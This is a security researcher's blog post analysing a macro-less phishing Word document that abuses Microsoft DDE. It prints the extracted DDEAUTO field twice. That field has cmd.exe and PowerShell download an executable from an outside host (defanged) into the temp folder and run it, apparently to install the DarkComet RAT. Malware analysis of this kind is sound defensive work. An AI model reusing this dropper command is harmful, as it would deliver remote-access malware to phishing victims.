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Dynamic Data Exchange (DDE) is Back in the Wild?

Published: 2021-02-19. Last Updated: 2021-02-19 07:00:37 UTC
by Xavier Mertens (Version: 1)
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DDE or "Dynamic Data Exchange" is a Microsoft technology for interprocess communication used in early versions of Windows and OS/2. DDE allows programs to manipulate objects provided by other programs, and respond to user actions affecting those objects. FOr a while, DDE was partially replaced by Object Linking and Embedding (OLE) but it's still available in the latest versions of the Microsoft operating system for backward compatibility reasons[1]. If fashion is known to be in a state of perpetual renewal, we could say the same in the cybersecurity landscape. Yesterday, I spotted a malicious Word document that abused this DDE technology.

The document was part of a phishing campaign and delivered as "e-Voucher.doc" (SHA256:de966b0d005dda776a6104f999f294d62c5b1f6b6e5c6f79de5135ec66ba4ee4) with a VT score of only 12/62[2]. Are we facing a new wave of such documents? I searched for similar documents on VT for the last 90 days and spotted only 5 files:

Let's have a look at this sample. Because DDE is used, there is no macro involved:

remnux@remnux:/MalwareZoo/20210218$ e-Voucher.doc 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7791 '1Table'
  5:      4096 'Data'
  6:     17502 'WordDocument'

Do we have interesting strings present in the document?

remnux@remnux:/MalwareZoo/20210218$ strings -n 30 e-Voucher.doc | less
 ddeauto "c:\\\\microsoft\\\\office\\\\word\\\\document\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\cmd.exe" "/c powershell.exe (new-object' htt
p://','%temp%\\mscalc.exe');start-process '%temp%\\mscalc.exe'"  \* mergeformat 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" 
accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

You can see the magic word "DDEAUTO" followed by a long command line. But how does it work from a Word processing perspective? When you open the document, you see a classic notification asking you to enable content:

The method used to create DDE links is to work with "fields". You can add fields in a Word document. They may of different information types but, in this case, the most useful is "formula". The attacker tried to hide the form behind the picture by using a very small font size:

By inspecting the field and editing its content, we found the same strings as seen above:

Here is a dump of the Powershell command:

c:\microsoft\office\word\document\..\..\..\..\windows\system32\cmd.exe" "/c powershell.exe (new-object'hxxp://fullhash[.]cloud/tmpl_c/mscalc.exe','%temp%\\mscalc.exe');start-process '%temp%\\mscalc.exe'

The targeted user will have to allow the execution of this command but the document remains very small, macro-less and detected by a low number of antivirus solutions. About the malware (SHA256:01b9193e59e2e91c749bd90201eee08ea80d8ddf6f138ff3b70fc69c95e2a75c), it seems to be a Darkcomet RAT[3].


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

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